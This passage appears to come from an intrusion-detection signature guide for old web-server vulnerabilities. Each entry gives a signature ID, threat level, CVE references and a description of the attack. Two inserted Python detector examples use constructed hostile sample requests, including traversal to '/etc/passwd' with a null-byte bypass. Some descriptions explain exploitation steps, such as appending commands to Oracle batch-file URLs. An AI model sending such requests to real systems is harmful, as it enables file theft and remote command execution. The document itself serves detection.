6.3, SGI IRIX 6.2, and SGI IRIX 5.3 are vulnerable versions that allow execution of arbitrary code. A vulnerability
exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. These vulnerable
versions allow a remote attacker to execute arbitrary commands on the vulnerable host as the user the web server is
running as. This can easily result in a user being able to access the system.
Signature ID: 1334
Htgrep access attempt vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0832
Signature Description: Htgrep is a cgi-bin script written in Perl, and can be used with any HTTP server that supports
cgi-bin scripts. Linux (kernel), Microsoft Windows NT 4.0, and Unix from various vendors are vulnerable to disclosure
of sensitive information; the vulnerability exists in the Htgrep CGI. An attacker can send a request that adds a header
and footer file to the search input to view arbitrary files in the Web server's directory with the privileges of the Web
user.
Signature ID: 1335
Htgrep access attempt vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0832
Signature Description: Htgrep is a cgi-bin script written in Perl, and can be used with any HTTP server that supports
cgi-bin scripts. Linux (kernel), Microsoft Windows NT 4.0, and Unix from various vendors are vulnerable to disclosure
of sensitive information; the vulnerability exists in the Htgrep CGI. An attacker can send a request that adds a header
and footer file to the search input to view arbitrary files in the Web server's directory with the privileges of the Web
user. This script allows remote attackers to read arbitrary files by specifying the full path name in the hdr parameter.
Signature ID: 1336
IChat directory traversal attempt
Threat Level: Information
Industry ID: CVE-1999-0897
Signature Description: iChat is a versatile instant text messaging application. The iChat 3.0 web server allows reading
arbitrary files via .. (dot dot) sequences. This issue is fixed in the latest version. Users are advised to update to the
latest version to resolve this issue.
Signature ID: 1337
IPlanet Web Publisher Remote Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2001-0746 CVE-2001-0747 Bugtraq: 2732
Signature Description: Web Publisher is an automated FTP client that allows a user to upload and then update a web
site easily. Web Publisher can automatically find and upload new and modified files. Netscape Enterprise Server 4.0nn,
Enterprise Server 4.1, and Sun iPlanet Web Server 4.1 SP3 through 4.1 SP7 are vulnerable versions; the Web
Publisher feature does not properly validate the Uniform Resource Identifier (URI). By sending an HTTP request
containing 2000 characters or more and specifying one of the Web Publisher specific methods, an attacker can
overflow a buffer to gain shell access to the server, possibly cause a denial of service against the affected server, or
possibly execute arbitrary code via this type of long URI request.
Signature ID: 1338
IPlanet Web Server Search Component File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1042 Bugtraq: 5191 Nessus: 11043
Signature Description: A Web server is a computer with a boot device or other disk containing a web site. HP-UX 11;
IBM AIX 4.3.3 and AIX 5.1; Microsoft Windows 2003 Server; RedHat Linux 6.2 and Linux 7.1; Sun iPlanet Web Server
4.1 and iPlanet Web Server 6.0; and Sun Solaris 2.6, Solaris 7.0, Solaris 8, and Solaris 9 are vulnerable. A malicious
user (remote attacker) could send a URL request containing "dot dot" sequences (/../) to the server as "NS-query-pat"
parameter values, which would cause the search engine to return the contents of the requested file; because the server
does not properly validate the user-supplied data in such a request, it is possible to traverse directories and retrieve
arbitrary files from the Web server.
Signature ID: 1339
Owl Intranet Engine Login Mechanism vulnerability
Threat Level: Warning
Nessus: 11626
Signature Description: Owl is a multi user document repository (knowledge base) system written in PHP4 for
publishing files/documents onto the web for small to medium business level groups. This rule triggers when an attempt
is made to log in to see the files and folders in the repository. Owl Intranet Engine version 0.71 is vulnerable to login
bypass due to an error in the validation of user credentials supplied to the PHP script 'browse.php'. This can be
exploited by a malicious person to bypass user authentication by requesting the affected PHP script and supplying an
invalid username.
Signature ID: 1340
Allaire JRun Web Root Directory Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1510 Bugtraq: 3592 Nessus: 10814
Signature Description: Allaire JRun is a web application development suite with JSP and Java Servlets. Macromedia
JRun 3.0 and Macromedia JRun 3.1 are vulnerable versions. A remote attacker could send a malformed URL for a
server JSP page; due to the improper handling of such malformed URLs, a vulnerability exists in Allaire JRun which
could disclose the contents under the web server root directory. It is also possible to view the contents of any
subdirectories along with ACL protected resources. This vulnerability could also be used to disclose the source of
known files residing on the host, including the source of ASP files.
Signature ID: 1341
Diva LAN ISDN Modem Denial of Service vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1533 Bugtraq: 665
Signature Description: Diva LAN ISDN Modem is a powerful networking solution for SOHO and branch office users.
It creates a complete networking, fax, phone and data communications system in one box. Eicon Networks DIVA T/A
ISDN Modem 2.0, Eicon Networks DIVA T/A ISDN Modem 1.0, and Eicon Networks DIVA LAN ISDN Modem 1.0
Release 2.5 are versions vulnerable to denial of service. A remote attacker can connect to the Diva HTTP port and send
a GET request (using the syntax 'login.html?password=<very long string>') to cause the system to lock up: the
attacker sends a request to the login.html page with a very long value for the 'password' parameter, after which the
device cannot give any response and the system is under DoS.
Signature ID: 1342
WEB ls%20-l
Threat Level: Information
Signature Description: The ls command lists all of the files and subdirectories in a given directory. To look at details
about these files and directories, ls -l can be used, which shows a long listing. This rule triggers when an attacker sends
'ls -l' to an HTTP web server.
Signature ID: 1343
Mailman cross site scripting vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0855 Bugtraq: 5298
Signature Description: Mailman is the GNU mailing list manager. It provides standard list management features,
integrated with a web interface. All versions from GNU Mailman 2.0 to GNU Mailman 2.0.11 are vulnerable: GNU
Mailman is prone to a cross-site scripting vulnerability. A remote attacker could send specially-crafted script code in
the URI parameters of the mailing list subscribe scripts, which is not sanitized when the request is received. An attacker
may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the
link.
Signature ID: 1344
EZMall2000 Credit Card Exposure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0606 Bugtraq: 2266
Signature Description: EZMall 2000 is an e-commerce application designed to handle the online purchases of products
by customers. However, when the package is improperly configured, search engines may index the data of customers,
including sensitive information such as credit card numbers. Seaside Enterprises EZMall 2000.0 is a vulnerable
version. This makes it possible for a user with malicious motives to use search engines as a means of finding vulnerable
sites, and then visit the sites to gain sensitive information such as credit card numbers, addresses, and other personal
information.
Signature ID: 1345
Mkplog.exe access
Threat Level: Information
Signature Description: This event is generated when an attempt is made to exploit a known vulnerability on a web
server or a web application resident on a web server.
Signature ID: 1346
Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1217 CVE-2000-1235 Bugtraq: 3727,2150 Nessus: 10849,10854
Signature Description: Oracle 9i Application Server ships with an Apache-based web server and support for
environments such as SOAP, PL/SQL, XSQL and JSP. The PL/SQL Apache module for Oracle 9iAS provides
functionality for remote administration of the Database Access Descriptors and access to help pages. Oracle 9i
Application Server is vulnerable to directory traversal: a remote attacker can send a specially crafted web request
containing double-encoded variations of dot-dot-slash (../) sequences to break out of the 'admin' directory. If the
attacker can browse the file system of the host, they can display the contents of arbitrary web-readable files. This is
only an issue on Microsoft Windows NT/2000 operating systems.
Signature ID: 1347
Brightstation Muscat Root Path Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0224 Bugtraq: 2374 Nessus: 10609
Signature Description: Brightstation Muscat is a search engine application. Brightstation Muscat 1.0 discloses the
physical location of a virtual web directory on the host. A remote attacker can send a specially crafted URL with an
invalid database path to the Empower CGI script, causing the script to return an error message that reveals the actual
database path. Successful exploitation gives a remote user access to confidential path information, which may assist in
further attacks against the host.
Signature ID: 1348
Nessus 1.X 404 probe Vulnerability
Threat Level: Information
Signature Description: Nessus is a tool designed to automate the testing and discovery of known security problems.
This event is generated when a Nessus 1.x scanner requests a nonexistent file to learn how the web server responds. A
web server that does not return a '404 Not Found' error code when a nonexistent file is requested, perhaps returning a
site map, search page or authentication page instead, confuses such file-existence checks.
Signature ID: 1349
Nessus 2.x 404 probe Vulnerability
Threat Level: Information
Nessus: 10386
Signature Description: Some applications do not perform stringent checks when validating the credentials of a client
host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to those of the administrator. Data stored on the machine can be compromised and trust relationships between
the victim server and other hosts can be exploited by the attacker. This log is generated when an attempt is made to
ascertain whether or not a web server, or an application running on a web server, is subject to a possible vulnerability
using the tool Nessus 2.x.
Signature ID: 1350
Net attempt Vulnerability
Threat Level: Information
Signature Description: Net.exe is a command-line program that ships with Windows and lets a user control services
from a command prompt; it is also used to modify user accounts. This rule triggers when an attacker requests net.exe
through the web server. Successful exploitation can allow an attacker to gain sensitive information and modify user
accounts, including user names and passwords.
Signature ID: 1351
Nstelemetry.adp access
Threat Level: Information
Industry ID: CVE-1999-0508 Nessus: 10753
Signature Description: AOLserver has a built-in statistics-gathering system that collects data on the caches, Tcl
interpreters, threads, and other interesting data. The file "nstelemetry.adp" can be dropped into any running server to
get a snapshot of how it is doing; it can be found in the tests/ directory of the AOLserver source distribution. Because it
reveals internal server state, it should not be reachable in production. This rule generates an event when a request
contains the "nstelemetry.adp" pattern.
Signature ID: 1353
Oracle Web Listener Batch File Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0169 Bugtraq: 1053 Nessus: 10348
Signature Description: Oracle Web Listener for NT uses various batch files as CGI scripts, which are stored in the
/ows-bin/ directory by default. Oracle Web Listener 4.0.x for NT is vulnerable. Any of these batch files can be used to
run arbitrary commands on the server simply by appending '?&' and a command to the file name in the URL. The
command runs at the SYSTEM level. The name of a batch file is not even necessary, as the server translates the '*'
character and applies the appended string to every batch file in the directory. Moreover, UNC paths can be used to
cause the server to download and execute remote code.
Signature ID: 1354
HTTP Post Arbitrary Perl Code Execution vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1436 Bugtraq: 5520 Nessus: 11158
Signature Description: NetWare is a network operating system developed by Novell, Inc. It initially used cooperative
multitasking to run various services on a PC, and its network protocols were based on the archetypal XNS stack.
Novell NetWare 6.0 SP1, NetWare 6.0, NetWare 5.1 SP4 and NetWare 5.1 are vulnerable: these versions allow remote
attackers to execute arbitrary code via crafted requests. They do not properly validate user input supplied through the
URI, so a remote attacker could exploit this vulnerability by sending arbitrary Perl code to the web server in an HTTP
POST request. Patches are available from the Novell website.
Signature ID: 1355
PowerScripts PlusMail WebConsole Poor Authentication vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0074 Bugtraq: 2653 Nessus: 10181
Signature Description: PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining
mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative user name and password
without knowing the current one, by passing the proper arguments to the plusmail script (typically /cgi-bin/plusmail).
This can be accomplished by submitting the argument "new_login" with the value "reset password". The other
arguments the script expects are "user name", "password" and "password1", where "user name" is the new login name
and "password" and "password1" contain matching values for the new password. PowerScripts PlusMail WebConsole
1.0 is prone to this vulnerability.
Signature ID: 1356
Queryhit.htm access Vulnerability
Threat Level: Information
Nessus: 10370
Signature Description: Queryhit.htm is a sample search page. It can be used to locate password (.pwd) files on the
system. This rule triggers when an attacker requests the queryhit.htm file; an attacker can use this page to read
sensitive files or gather sensitive information.
Signature ID: 1357
Remote Command Service attempt Vulnerability
Threat Level: Information
Signature Description: The Remote Command Service consists of client and server components. The client component
is a command-line program, Rcmd.exe, that provides a secure, stable way to remotely administer and run command-line
programs. The server component, Rcmdsvc.exe, is installed and run as a service. This rule triggers when an attacker
requests 'rcmd.exe' through the web server; an attacker can use this to execute arbitrary commands on the system.
Signature ID: 1358
Robots.txt file access vulnerability
Threat Level: Warning
Nessus: 10302
Signature Description: The robots.txt file exists on the web server to instruct automated crawling engines (such as
Yahoo! or Google) NOT to index specified areas of the application. Robots.txt is a regular text file that, through its
name, has special meaning to the majority of "honorable" robots on the web. By defining a few rules in this robots.txt
file, we can instruct robots not to crawl and index certain files or directories within the site, or the site at all. Because it
lists exactly the paths the site owner does not want indexed, it is also a useful reconnaissance source for an attacker,
which is why access to it is logged.
Signature ID: 1359
Caldera OpenLinux 2.3 rpm_query CGI information disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0192 Bugtraq: 1036 Nessus: 10340
Signature Description: Caldera OpenLinux is a defunct Linux distribution created by the former Caldera Systems
corporation. It was an early "business oriented distribution" and foreshadowed the direction of developments that later
came to most other distributions and the Linux community generally. Caldera OpenLinux 2.3 is vulnerable to
information disclosure: a CGI named rpm_query is installed in /home/httpd/cgi-bin/. Any user can run this CGI and
obtain a listing of the packages, and versions of packages, installed on the system. Remote attackers may use this
information to identify what vulnerable software packages have been installed.
Signature ID: 1360
Solaris sadmind Buffer Overflow Vulnerability
Threat Level: Information
Signature Description: sadmind provides remote system administration operations on Solaris; it is installed by default
and the service is started automatically. sadmind contains a buffer overflow vulnerability. This rule triggers when an
attacker attempts to overwrite the stack of a running sadmind process; an attacker can use this vulnerability to
overflow a buffer and execute arbitrary code with root privileges.
Signature ID: 1361
Check Point Firewall-1 HTTP Parsing Engine URI Schema Format String Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0039 Bugtraq: 9581
Signature Description: The Check Point Firewall-1 NG HTTP Application Intelligence (AI) component is an
application proxy technology designed to prevent potential attacks or detect protocol anomalies targeted at servers
behind the firewall. The AI component contains an HTTP parsing vulnerability that is triggered by sending an invalid
HTTP request through the firewall. When various invalid portions of the request are specified, an error message is
generated in which a user may partially specify the format string to an sprintf() call. This rule checks for exploitation of
this vulnerability in the scheme field of a URI. By providing format string specifiers in the scheme field, an attacker may
corrupt memory and execute arbitrary code with super-user privileges. Administrators are advised to update the
software.
Signature ID: 1362
SAMBAR Server search.dll directory listing attempt Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0835 Bugtraq: 1684 Nessus: 10514
Signature Description: Sambar Server is a multi-threaded, extensible application server with a highly programmable
API. It has virtual domain support (currently name based) with independent document/CGI directories, log files, and
error templates. Sambar Server 4.4 Beta 3 and Sambar Server 4.3 ship with a vulnerability in search.dll that allows a
remote attacker to view the contents of the Sambar Server, such as mail folders, by passing paths or invalid values in
the 'query' variable. This rule triggers on a specially crafted URI request to search.dll with such a 'query' value.
Signature ID: 1363
Search.vts access security vulnerability
Threat Level: Warning
Bugtraq: 162
Signature Description: Verity's SEARCH'97 is a search product suite comprising SEARCH'97 Information Server,
SEARCH'97 Agent Server, SEARCH'97 CDWeb Publisher, SEARCH'97 Agent Server Toolkit, SEARCH'97
Developer's Kit, SEARCH'97 Personal for Microsoft Exchange and SEARCH'97 Information Server for Microsoft
Exchange. Verity Search97 2.1 is vulnerable. The vulnerability is due to the cgi-bin scripts s97_cgi and s97r_cgi failing
to check for certain shell metacharacters, which allows an attacker to access any file on the file system.
Signature ID: 1364
HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
Threat Level: Warning
Bugtraq: 9973 Nessus: 12120
Signature Description: HP Web Jetadmin is a print and imaging peripheral management tool that helps optimize device
utilization, control color costs, secure devices, and streamline supplies management by enabling remote configuration,
proactive monitoring, security, troubleshooting, and reporting of printing and imaging devices. HP Web Jetadmin
7.5.2456 is vulnerable to remote arbitrary command execution. This issue is due to a failure of the application to
properly validate and sanitize user-supplied input. A remote attacker could send a malicious request to setinfo.hts,
which does not validate the user input it receives. Successful exploitation of this issue will allow a malicious user to
execute arbitrary commands on the affected system.
Signature ID: 1365
Quikstore plain text administrator password access Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1188 CVE-1999-0607 Bugtraq: 1983,2049 Nessus: 10712
Signature Description: QuikStore is a commercial storefront program providing order management, inventory, and
other e-commerce related functions to web sites. Certain versions of QuikStore store the administrator name and
password in plain text in the configuration file "quikstore.cfg". An unsecured default installation leaves this file
world-readable, giving remote intruders access to it through the web server. With access to this file and the
user/password combination contained in it, the intruder has full administrative access to the online store. QuikStore 1.0
is prone to this vulnerability.
Signature ID: 1366
3COM OfficeConnect HTTP Port Router Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0740 Bugtraq: 2721
Signature Description: The 3Com OfficeConnect line is a series of all-in-one small-office routers. 3Com OfficeConnect
DSL Router 840 1.1.7 and 3Com OfficeConnect DSL Router 812 1.1.7 are vulnerable to a denial of service attack. A
remote attacker can reboot the router by connecting to the HTTP daemon and requesting a malformed URL containing
a long character string; the router will power-cycle itself. This makes it possible for a remote user to deny service to
legitimate users of networks serviced by the router.
Signature ID: 1367
Netware 6.0 Tomcat source code viewer Vulnerability
Threat Level: Warning
Nessus: 12119
Signature Description: Apache Tomcat is a Java servlet and JSP container; Apache HTTP Server is a very popular,
freely available web server that runs on a variety of operating systems, including UNIX, Linux, and Microsoft Windows
(Win32). This event is generated when an attempt is made to access source.jsp on the Tomcat web server shipped with
NetWare 6.0. An attacker can use directory traversal techniques when accessing source.jsp to view hidden files and
directories on the web server with the access privileges of the server.
Signature ID: 1368
Trend Micro InterScan eManager buffer overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0958 Bugtraq: 3327 Nessus: 11747
Signature Description: Trend Micro InterScan eManager is a plug-in for InterScan which manages spam, message
content, and mail delivery. It can be managed through a web-based console interface. Trend Micro InterScan
eManager 3.51 and 3.51J are vulnerable to a stack-based buffer overflow. Several CGI components of eManager do not
validate user input: overly long values received in a request are copied into a fixed-size stack buffer without a length
check, overflowing it and allowing an attacker to execute arbitrary code in the Local System context. This signature
triggers when an attacker requests the 'spamrule.dll' file.
Signature ID: 1369
Webcam Corp's Webcam Watchdog sresult.exe Cross-Site Scripting vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2528 Bugtraq: 10837 Nessus: 14186
Signature Description: Webcam Watchdog can record video over a long period of time and monitor a remote location
over the Internet. Watchdog is useful for starting video recording when motion is detected, and can also raise an alert
by emailing the captured image and playing an alarm sound. Webcam Corp Webcam Watchdog 4.0.1 is affected by a
remote cross-site scripting vulnerability in the sresult.exe binary. Because the software does not properly validate
user-supplied input, a remote attacker can pass malicious HTML code as the value of the affected URI parameter to
'sresult.exe', creating a malicious link containing script code that will be executed in the browser of a legitimate user.
Signature ID: 1370
Telnet attempt on HTTP
Threat Level: Information
Signature Description: This event is generated when an attempt is made to access the telnet service through a web
request. Where telnet can be reached via an HTTP request, attackers may use it to enter the vulnerable system.
Signature ID: 1371
Tftp attempt on HTTP
Threat Level: Information
Signature Description: This event is generated when an attempt is made to access the tftp service through a web
request. Where tftp can be reached via an HTTP request, attackers may use it to download information from, or upload
it to, the vulnerable system.
Signature ID: 1372
UltraBoard DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0426 CVE-2002-0749 Bugtraq: 1175,4579 Nessus: 11748
Signature Description: UltraBoard is a powerful, easy to use and navigate, fully customizable bulletin board system. It
can add interactive message boards to any web site and can dramatically increase user interest in and use of a web
site. UltraScripts UltraBoard 1.6 and prior versions are vulnerable to denial of service. A remote attacker is able to
exhaust all of the available resources of the web server with a specially devised request to the CGI. This request causes
the CGI to fork copies of itself, which consume the processor time and memory of the server until it can no longer
serve legitimate requests.
Signature ID: 1373
Unify eWave ServletExec DOS Attack Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1025 Bugtraq: 1868
Signature Description: Unify's eWave ServletExec is a JSP and Java servlet engine used as a plug-in to popular web
servers such as Apache, IIS and Netscape. It is possible to send a URL request that causes the ServletExec servlet
engine to terminate abruptly. Unify eWave ServletExec version 3.0c and earlier are susceptible to a denial of service
attack if a URL invoking the ServletExec servlet preceded by /servlet is requested. The ServletExec engine will attempt
to bind a server thread to port 80 and, if the web server is currently running, a java.net.BindException results, halting
all operations on the ServletExec engine. Restarting the application is required in order to regain normal functionality.
Signature ID: 1374
CalaCode @mail Webmail System Cross-Site Scripting Attempt Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2379 Bugtraq: 9748
Signature Description: CalaCode @Mail is a webmail client and email server platform that allows users to send and
receive email via the web, a wireless device or a desktop client. CalaCode @mail Webmail System version 3.64 is
vulnerable to cross-site scripting. The application does not validate user input submitted to the util.pl script, so a
remote attacker could embed malicious JavaScript in the "Displayed Name" field, which would be executed in the
victim's web browser within the security context of the hosting site once the entry is viewed. An attacker could use this
vulnerability to steal the victim's session ID and gain unauthorized access to the victim's email.
Signature ID: 1376
Nombas ScriptEase:Webserver Viewcode Arbitrary File Access Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1580 Bugtraq: 3715
Signature Description: Nombas ScriptEase:Webserver Edition is designed to allow the development of web-based
applications in JavaScript. It includes the ability to execute JavaScript code in response to CGI requests, and support
for developer features such as remote debugging. Nombas ScriptEase:Webserver Edition 4.30d and 4.30b for all
platforms are vulnerable: default scripts included with ScriptEase:Webserver Edition allow remote users to disclose
arbitrary files residing on the host. A remote attacker can send a specially crafted URL containing dot-dot (..)
sequences to traverse directories and view any file on the web server.
Signature ID: 1377
Bradford Barrett Webalizer Cross-Agent Scripting Attack Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0835 Bugtraq: 3473 Nessus: 10816
Signature Description: The Webalizer is a GPL application that generates web pages of analysis from access and
usage logs, i.e. it is web log analysis software. It is one of the most commonly used web server administration tools,
producing highly detailed, easily configurable usage reports in HTML format for viewing with a standard web browser.
Bradford L. Barrett's Webalizer 2.01-06 and prior versions are vulnerable to cross-site scripting. If the HTTP referrer
information is stored in log files analyzed by Webalizer, a remote attacker can inject malicious HTML tags into a report
by sending a "Referer" HTTP header containing HTML metacharacters during keyword searches, executing scripts in
the browser of anyone who views the compromised HTML reports.
Signature ID: 1378
Webcart access vulnerability
Threat Level: Information
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: The WebCart shopping cart system is one of the popular e-commerce systems on the Internet.
Various shopping carts create world-readable files in the web server's document tree, which have subsequently been
indexed by numerous search engines. By default there are some files or directories that are world-readable. This
misconfiguration may allow an attacker to gather the credit card numbers of clients.
Signature ID: 1379
Mountain-net WebCart Exposed Orders Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information, including credit card details and
other sensitive information, to remotely accessible text files. This signature detects access to '/webcart-lite'.
Signature ID: 1380
O'Reilly Software WebSite 'webfind.exe' Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0622 Bugtraq: 1487
Signature Description: O'Reilly Software WebSite Professional is a web server package distributed by O'Reilly &
Associates. WebSite Professional 2.4.9, 2.4 and 2.3.18 contain a remotely exploitable buffer overflow in a search
engine utility titled 'webfind.exe'. This program takes unchecked user input from a provided search page, which can
result in a remote user launching arbitrary commands on the server itself. The variable that is overflowed is
QUERY_STRING, derived from the user's 'keywords' search parameter, by supplying an overly long 'keywords' value.
Signature ID: 1381
NT Index Server Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0097 Bugtraq: 950
Signature Description: Microsoft Index Server (Microsoft Indexing Service) allows the contents of files to be indexed
to enable free-text searching, so that an intranet with well over 2000 documents lets users quickly find those most
relevant to them. Microsoft Indexing Services for Windows 2000 and Microsoft Index Server 2.0 allow a remote
attacker to access arbitrary files outside of the web path. A remote attacker could send a URI request containing
traversal-style sequences (../../) in the "CiWebHitsFile" variable. The issue is due to the webhits.dll library not
properly validating user input. By supplying this type of crafted request to an htw script, it is possible to read arbitrary
files on the system.
Signature ID: 1382
Extropia WebStore Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1005 Bugtraq: 1725,1774
Signature Description: WebStore is the culmination of eXtropia's experience with online shopping applications. It
merges both the Electronic Outlet HTML and Database versions and adds new routines for error handling, order
processing, encrypted mailing, frames, JavaScript and VBScript and other features. Extropia WebStore 1.0 and 2.0
allow a remote attacker to view any file accessible to the web_store.cgi script, because the script does not properly
validate user-supplied input. A remote attacker could send a specially crafted URL request to web_store.cgi that
bypasses the file extension check by adding a null character (%00) to the URL, followed by the .html file extension, to
view non-HTML files. By including "dot dot" (/../) sequences in the URL, a remote attacker can traverse directories on
the web server to view any file that is accessible to the web_store.cgi script.
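The double-encoded traversal described for Oracle 9iAS (Signature 1346) and the null-byte extension bypass with traversal described here for WebStore (Signature 1382) both need the same first step in a detector: decode the request the way the target would before matching. The following Python is an added example, not code from this guide or from the TMS module; the request paths are constructed, and the script names other than web_store.cgi, the target files and the decode-pass limit are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths, not captured traffic. The script names
# other than web_store.cgi and the target files are assumptions.
SAMPLE_REQUESTS = [
    "/pls/admin/../../../winnt/win.ini",                          # plain traversal
    "/pls/admin/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini",             # single-encoded
    "/pls/admin/%252e%252e/%252e%252e/%252e%252e/winnt/win.ini", # double-encoded, as in 1346
    "/cgi-bin/web_store.cgi?page=../../../etc/passwd%00.html",   # null byte + traversal, as in 1382
    "/cgi-bin/web_store.cgi?page=products.html",                 # benign
    "/pls/admin/help/index.html",                                # benign
]

# How many decode rounds to attempt; an attacker gains nothing from encoding
# more deeply than the target decodes, so a small bound is enough (assumption).
MAX_DECODE_PASSES = 3

def normalize(path, max_passes=MAX_DECODE_PASSES):
    """Percent-decode until the string stops changing.

    Returns (decoded, passes); passes counts the rounds that changed the
    string, so 2 or more means the request was double-encoded."""
    current, passes = path, 0
    for _ in range(max_passes):
        decoded = unquote(current)
        if decoded == current:
            break
        current, passes = decoded, passes + 1
    return current, passes

# ".." followed by a forward or back slash, anywhere in the decoded request.
TRAVERSAL = re.compile(r"\.\.[\\/]")

def analyse(path):
    """Return the list of findings for one request path (empty if clean)."""
    decoded, passes = normalize(path)
    findings = []
    if passes >= 2:
        findings.append("double-encoded")
    if "\x00" in decoded:
        findings.append("null-byte")
    if TRAVERSAL.search(decoded):
        findings.append("traversal")
    return findings

def scan(requests):
    """Map each request to its findings; a raw-byte '../' match would miss
    the encoded samples entirely."""
    return {req: analyse(req) for req in requests}

if __name__ == "__main__":
    for req, findings in scan(SAMPLE_REQUESTS).items():
        print(f"{req:60s} {findings or 'clean'}")
```

A signature that matches '../' on the raw bytes sees only the first sample. Counting decode passes is what lets the double-encoded request be flagged on its own, even when the fully decoded path would otherwise look like an ordinary traversal; the same normalization also exposes the %00 that web_store.cgi's extension check never saw.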
Signature ID: 1383
HTTP HEAD Request with Large Message-Body vulnerability
Threat Level: Warning
Industry ID: CVE-2008-1854 CVE-2008-1777 CVE-2006-5850 CVE-2003-0409
Signature Description: The HTTP HEAD method is identical to GET except that the server MUST NOT return a
message-body in the response. The meta-information contained in the HTTP headers in response to a HEAD request is
identical to the information sent in response to a GET request (RFC 2616). This method can be used for obtaining
meta-information about the entity implied by the request without transferring the entity-body itself, and is often used
for testing hypertext links for validity, accessibility, and recent modification. Normally a HEAD request carries no body,
so a body in the packet is anomalous. Many tools, such as Whisker, use this method to send anomalous data to a server.
BRS WebWeaver 1.04, Essentia Web Server 2.15, Novell eDirectory 8.8.2 and SmarterMail 5.0.2999 are vulnerable to
denial of service or stack-based buffer overflow through such requests.
Signature ID: 1384
MiniShare HTTP HEAD Request Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2035 Bugtraq: 10417
Signature Description: MiniShare is free web server software for Microsoft Windows that provides a quick and easy
way to share files: the shared files are located on the user's computer and can be accessed by anyone using a web
browser. MiniShare 1.3.2 is vulnerable to denial of service. According to the HTTP RFC (2616), any HTTP request
should follow a fixed format, i.e. METHOD <space> path(URI) <space> HTTP/1.x. A remote attacker could send a
specially crafted HTTP HEAD request with fewer than two newline characters to the MiniShare server; the server does
not handle such a request properly and crashes. This rule detects one such attempt when it sees a request like HEAD/./.
Such traffic is also sent by tools like Whisker. The administrator should check the server's logs for more information.
Signature ID: 1386
HTTP Request with TAB and Splicing
Threat Level: Warning
Signature Description: According to the HTTP RFC, an HTTP 1.0 request looks like "Method <space> URI <space>
HTTP/Version CRLF CRLF", but many HTTP implementations also accept TAB as a delimiter, so the following request
is also valid: "Method <tab> URI <tab> HTTP/Version CRLF CRLF". If an IDS/IPS does not accept a TAB, it may
miss the pattern due to wrong parsing. Many IDS evasion tools, such as Whisker, take advantage of this fact and send
malformed URIs. This rule fires when the system detects an HTTP request with <tab> as the separator and the URI
spliced into small chunks.
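The three request-line anomalies described in Signatures 1383, 1384 and 1386 (a HEAD request carrying a body, a HEAD request that ends before the second newline, and TAB used as the request-line delimiter) can all be checked by one small parser that is lenient enough to see what the server sees. The following Python is an added example, not code from this guide or from the TMS module; the sample requests are constructed, and example.test is a hypothetical host. Splicing the request across several TCP segments, the other half of Signature 1386, is not visible at this layer: the checker must run on the reassembled stream.

```python
import re

# Constructed sample requests, not captured traffic; example.test is a hypothetical host.
SAMPLES = {
    "normal_get": b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "head_with_body": (b"HEAD /index.html HTTP/1.0\r\nHost: example.test\r\n"
                       b"Content-Length: 5\r\n\r\nAAAAA"),               # 1383
    "head_truncated": b"HEAD/./\n",                                       # 1384, MiniShare-style
    "tab_delimited": b"GET\t/cgi-bin/test.cgi\tHTTP/1.0\r\n\r\n",         # 1386
}

HEADER_END = (b"\r\n\r\n", b"\n\n")
LINE_BREAK = re.compile(rb"\r?\n")

def split_request(raw):
    """Separate the head (request line + headers) from the body, accepting
    CRLF CRLF or bare LF LF as the terminator, as lenient servers do."""
    for sep in HEADER_END:
        idx = raw.find(sep)
        if idx != -1:
            return raw[:idx], raw[idx + len(sep):]
    return raw, b""

def parse_headers(head):
    """Header name (lower-cased) -> value, skipping the request line."""
    headers = {}
    for line in LINE_BREAK.split(head)[1:]:
        name, _, value = line.partition(b":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    return headers

def inspect_request(raw):
    """Return the list of anomalies found in one HTTP request (empty if none)."""
    findings = []
    if raw.count(b"\n") < 2:
        findings.append("fewer-than-two-newlines")
    head, body = split_request(raw)
    request_line = LINE_BREAK.split(head)[0]
    if b"\t" in request_line:
        findings.append("tab-separator")
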